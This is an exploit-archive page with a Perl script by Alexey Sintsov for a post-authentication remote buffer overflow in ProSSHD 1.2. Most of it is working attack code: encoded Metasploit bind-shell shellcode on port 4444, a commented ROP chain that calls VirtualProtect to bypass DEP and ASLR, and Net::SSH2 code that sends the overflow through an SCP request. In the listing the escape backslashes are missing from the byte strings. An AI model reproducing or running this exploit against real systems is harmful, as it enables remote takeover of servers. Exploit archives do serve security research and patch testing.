[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Published : 2010-05-03
# Author : Alexey Sintsov
# Previous Title : VicFTPS v5.0 Directory Traversal
# Next Title : Acritum Femitter Server v1.03 Multiple Vulnerabilities
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine [www.xakep.ru]
#
#
# CVE: -
#!/usr/bin/perl
use Net::SSH2;
$username = '';
$password = '';
$host = '192.168.126.129'; #Remote host
#$host = '192.168.13.6';
$port = 22;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
$shell =
"xbaxdax29x13xdaxd9xe9xd9x74x24xf4x58x31xc9" .
"xb1x56x31x50x13x83xc0x04x03x50xd5xcbxe6x26" .
"x01x82x09xd7xd1xf5x80x32xe0x27xf6x37x50xf8" .
"x7cx15x58x73xd0x8exebxf1xfdxa1x5cxbfxdbx8c" .
"x5dx71xe4x43x9dx13x98x99xf1xf3xa1x51x04xf5" .
"xe6x8cxe6xa7xbfxdbx54x58xcbx9ex64x59x1bx95" .
"xd4x21x1ex6axa0x9bx21xbbx18x97x6ax23x13xff" .
"x4ax52xf0xe3xb7x1dx7dxd7x4cx9cx57x29xacxae" .
"x97xe6x93x1ex1axf6xd4x99xc4x8dx2exdax79x96" .
"xf4xa0xa5x13xe9x03x2ex83xc9xb2xe3x52x99xb9" .
"x48x10xc5xddx4fxf5x7dxd9xc4xf8x51x6bx9exde" .
"x75x37x45x7ex2fx9dx28x7fx2fx79x95x25x3bx68" .
"xc2x5cx66xe5x27x53x99xf5x2fxe4xeaxc7xf0x5e" .
"x65x64x79x79x72x8bx50x3dxecx72x5ax3ex24xb1" .
"x0ex6ex5ex10x2exe5x9ex9dxfbxaaxcex31x53x0b" .
"xbfxf1x03xe3xd5xfdx7cx13xd6xd7x0bx13x18x03" .
"x58xf4x59xb3x4fx58xd7x55x05x70xb1xcexb1xb2" .
"xe6xc6x26xccxccx7axffx5ax58x95xc7x65x59xb3" .
"x64xc9xf1x54xfex01xc6x45x01x0cx6ex0fx3axc7" .
"xe4x61x89x79xf8xabx79x19x6bx30x79x54x90xef" .
"x2ex31x66xe6xbaxafxd1x50xd8x2dx87x9bx58xea" .
"x74x25x61x7fxc0x01x71xb9xc9x0dx25x15x9cxdb" .
"x93xd3x76xaax4dx8ax25x64x19x4bx06xb7x5fx54" .
"x43x41xbfxe5x3ax14xc0xcaxaax90xb9x36x4bx5e" .
"x10xf3x7bx15x38x52x14xf0xa9xe6x79x03x04x24" .
"x84x80xacxd5x73x98xc5xd0x38x1ex36xa9x51xcb" .
"x38x1ex51xde";
$fuzz = "x41"x491 . # buffer before RET addr rewriting
############################### ROP
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this make stack executable:
#### RET rewrite###
"x9Fx07x37x7C". # MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset
"x11x11x11x11". # JUNK---------------^^^ ^^^
"x22x22x22x22". # JUNK-------------------------^^^
"x27x34x34x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"x33x33x33x33". # JUNK------------------------------^^^
"xC1x4Cx34x7C". # POP EAX / RETN
# ^^^
"x33x33x33x33". # ^^^
"x33x33x33x33". # ^^^
"x33x33x33x33". # ^^^
"x33x33x33x33". # ^^^
# ^^^
"xC0xFFxFFxFF". # ----^^^ Param for next instruction...
"x05x1ex35x7C". # NEG EAX / RETN ; EAX will be 0x40 (param for VirtualProtect)
"xc8x03x35x7C". # MOV DS:[ECX], EAX / RETN ; save 0x40 (3 param)
"x40xa0x35x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
"xA1x1Dx34x7C". # DEC EAX / RETN ; Change position
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN ; EAX=ECX-0x0c
"x08x94x16x7C". # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)
"xB9x1Fx34x7C". # INC EAX / RETN ; oh ... and move pointer back
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN ; EAX=ECX=0x8
"xB2x01x15x7C". # MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)
"xA1x1Dx34x7C". # DEC EAX / RETN ; Change position for output from VirtualProtect
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"x27x34x34x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"x33x33x33x33". # JUNK------------------------------^^^
"x40xa0x35x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
#
"x33x33x33x33". #
"x33x33x33x33". #
"x33x33x33x33". #
"x33x33x33x33". #
"xB9x1Fx34x7C". # INC EAX / RETN ; and again...
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN
"xE5x6Bx36x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)
"xBAx1Fx34x7C"x204 . # RETN fill.....
"xDDx28x35x7C". # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN ;Call VirtualProtect
"AAAABBBBCCCCDDDD". # Here is place for params (VirtualProtect)
####################### retrun into stack after VirtualProtect
"x1AxF2x35x7C". # ADD ESP, 0xC / RETN ; take next ret
"XXXYYYZZZ123". # trash
"x30x5Cx34x7C". # 0x7c345c2e: ANDPS XMM0, XMM3 -- (+0x2 to address and....) --> PUSH ESP / RETN ; EIP=ESP
"x90"x14 . # NOPs here is the begining of shellcode
$shell; # shellcode 8)
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "nError: Connection Refused!n";
$ssh2->auth_password($username, $password) || die "nError: Username/Password Denied!n";
#sleep(10);
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();